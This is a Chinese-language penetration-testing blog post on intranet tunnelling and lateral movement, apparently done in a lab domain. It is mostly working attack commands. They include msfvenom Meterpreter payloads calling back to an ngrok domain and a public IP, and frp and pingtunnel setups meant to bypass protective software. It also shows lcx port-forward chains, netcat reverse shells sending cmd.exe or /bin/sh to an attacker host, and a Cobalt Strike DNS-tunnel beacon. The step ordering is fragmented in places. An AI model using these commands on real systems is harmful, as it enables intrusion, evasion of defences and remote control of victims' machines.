基础27-域横向之内网穿透及隧道技术原创 M9 小白渗透成长之路 2022-02-15 08:30
收录于话题
#渗透基础34个
#域渗透7个
运行
代理成功
第二步:控制端-下载-解压-修改-启动
控制端修改配置文件
第四步:msf生成木马
第三步:
请求数据给本地 1080
第二步:
第三步:
利用kali连接同网段的主机的7777端口
微信公众号:[小白渗透成长之路]
[如果你觉得Md2All对你有帮助,欢迎赞赏][????????]
内容目录案例一、内网穿透ngrok测试演示案例二、内网穿透 Frp 自建跳板测试????隧道概念简介????案例三、网络层ICMP隧道Ptunnel使用案例四、传输层转发隧道Portmap使用 案例五、传输层转发隧道Netcat使用1.双向连接反弹 shell正向:攻击机连接受害机反向:受害机连接攻击机2.多向连接反弹shell-配合转发案例六、利用应用层DNS隧道配合CS上线
案例一、内网穿透ngrok测试演示-两内网通讯上线案例拓扑图
使用工具:https://www.ngrok.cc/现在需要实名了,而且要两块钱手续费。(没有之前好用了)
第一步:申请完主机后下载客户端,将sunny(linux端)放在kali主机上
第二步,生成后门文件
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe
注意:host写ngrok免费赠送的域名,因为域名的指向地址就是我们的内网ip。
第三步:将生成的后门文件上传到被控机。
进入msf,设置监听,再运行后门,成功反弹。
案例二、内网穿透 Frp 自建跳板测试-两个内网通讯上线项目地址:https://github.com/fatedier/frp
配置安装使用教程:https://blog.csdn.net/weixin_44823747/article/details/105414284
自行搭建,方便修改,成本低实现多元化。
第一步:服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件 frps.ini:[common] bind_port = 6677
启动服务端:
./frps -c ./frps.ini
frpc.ini:[common] server_addr = 你的云主机 ip server_port = 6677 #frpc 工作端口,必须和上面 frps 保持一致 [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 #转发给本机的 5555 remote_port = 6000 #服务端用 6000 端口转发给本机 启动客户端:
第三步:运行
./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o frp.exe
第五步:msf设置监听端口,运行生成后门即可上线。
隧道概念简介在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截。
常用的隧道技术有以下三种:
网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道
CS、MSF 无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等,需要使用隧道技术。
案例三、网络层ICMP隧道Ptunnel使用,检测利用环境拓扑图:
pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具
因为我们需要拿下的主机上存在防护软件,我们需要将防护软件检测的tcp/udp/sock5的协议流量伪装成ICMP,达到绕过检测的目的。
项目地址:https://github.com/esrrhs/pingtunnel(二次开发版)
常用指令:-p ##表示连接 icmp 隧道另一端的机器 IP(即目标服务器) -lp ##表示需要监听的本地 tcp 端口 -da ##指定需要转发的机器的 IP(即目标内网某一机器的内网 IP)-dp ##指定需要转发的机器的端口(即目标内网某一机器的内网端口)-x ##设置连接的密码
第一步:
Webserver:./ptunnel -x xiaodi
第二步:
Hacker xiaodi:./ptunnel -p 192.168.76.150 -lp 1080 -da 192.168.33.33 -dp 3389 -x xiaodi #转发的 3389
Hacker xiaodi:rdesktop 127.0.0.1 1080
案例四、传输层转发隧道 Portmap 使用-检测,利用工具:
windows: lcx
linux:portmap
第一步:
lcx -slave 攻击 IP 3131 127.0.0.1 3389 #将本地 3389 给攻击 IP 的 3131
lcx -listen 6666 7777#监听 6666至 7777
过程总结:受害机将自己的3389转发到与自己同网段的webserver主机上的某一端口上,然后webserver主机再将监听到的主机再次转发到本机的其他端口,然后攻击机与webserver处于同一网段,所以可以直接连接webserver的端口,就相当于连接了受害机的3389端口,而webserver相当于跳板。
流程:受害机将cmd反弹给本地的1234端口,攻击机主动去连接受害机的1234端口。
前期准备:
1.云主机 teamserver 配置端口 53 启用-udp(cs服务端)
2.买一个域名修改解析记录如下:
A 记录->cs 主机名->CS 服务器 IP最后设置完后总体图:
执行
第三步:上线
但是因为是dns上线,所以非常慢。
需要执行两条命令
案例五、传输层转发隧道 Netcat 使用-检测,利用,功能攻击机:Kali2020-god
中间机:webserver-god
受害机:sqlserver|dc
1.双向连接反弹 shell正向:攻击连接受害 受害机命令如下:nc -ldp 1234 -e /bin/sh #linux命令
nc -ldp 1234 -e c:\windows\system32\cmd.exe #windows命令
将自身cmd的界面反弹给1234端口
攻击:nc 192.168.76.132 1234 //主动连接
攻击机直接连接192.168.76.132端口的1234端口,就可以直接连接到受害机的cmd。
反向:受害连接攻击攻击机命令:
nc -lvp 1234
受害机命令:
nc 攻击主机 IP 1234 -e /bin/sh #linux
nc 攻击主机 IP 1234 -e c:\windows\system32\cmd.exe #windows
流程:攻击机不动,只监听自己本地的1234端口,而受害机将本地cmd转发给攻击机的1234端口。
2.多向连接反弹shell-配合转发实现目标:kali(192.168.76.132)连接sqlserver机(192.168.33.31)【拓扑图在案例三】
第一步:
god\Webserver:Lcx.exe -listen 2222 3333
监听自身的2222端口,并转发到3333端口上
第二步:
god\Sqlserver:nc 192.168.3.31 2222 -e c:\windows\system32\cmd.exe
sql机主动将自己的cmd转发到webserver的2222端口上。(web和sql有同一网段的网卡)
第三步:
kali 或本机:nc -v 192.168.76.143 3333
然后kali和web又有同一网段的网卡,所以就相当于直接连接了sql机。
正向该怎么操作呢?实战中改怎么选择正向和反向?
答:可以攻击机可以直接连接被害机就使用正向,如果不能直接连接就使用反向,具体看情况而定。
案例六、利用应用层 DNS 隧道配合 CS 上线前提:对方主机存在防护,封堵检测网络层,传输层的一些协议导致无法上线或者网络多次断连,当常见协议监听器被拦截时,可以换其他协议上线,其中 dns 协议上线基本通杀。
木马绑定什么协议,看监听器的选择。
CS监听器选择DNS隧道
NS 记录->ns1 主机名->上个 A 记录地址
NS 记录->ns2 主机名->上个 A 记录地址
然后就可以开始使用了
第一步:配置DNS监听内容如下。
第二步,生成后门文件
beacon> checkin
beacon> mode-txt
需要等待一会,成功上线。
小白渗透成长之路
一个非科班的信安小白,会将自己平时遇到的好的经验分享出来,共勉。同时也会转推一些大佬文章,小白成长之路,大佬勿喷呀。
69篇原创内容
公众号
喜欢此内容的人还喜欢
【讨论:层面与断面的拓扑关系处理】午奖飞花舞,化作十年雪
GI 地质智能软件平台
不喜欢
确定
不看的原因
- [color=rgba(0, 0, 0, 0.9)]内容质量低
发表于 2022-2-15 16:59:26
